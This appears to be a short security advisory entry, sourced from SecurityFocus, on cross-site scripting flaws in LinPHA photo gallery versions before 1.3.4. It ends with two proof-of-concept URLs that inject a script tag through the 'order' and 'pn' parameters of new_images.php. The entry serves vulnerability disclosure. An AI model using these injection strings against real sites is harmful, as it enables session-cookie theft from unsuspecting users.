10 lines
No EOL
684 B
Text
Executable file
10 lines
No EOL
684 B
Text
Executable file
source: http://www.securityfocus.com/bid/34500/info
|
|
|
|
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
|
|
|
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
|
|
|
|
Versions prior to LinPHA 1.3.4 are vulnerable.
|
|
|
|
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
|
|
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E |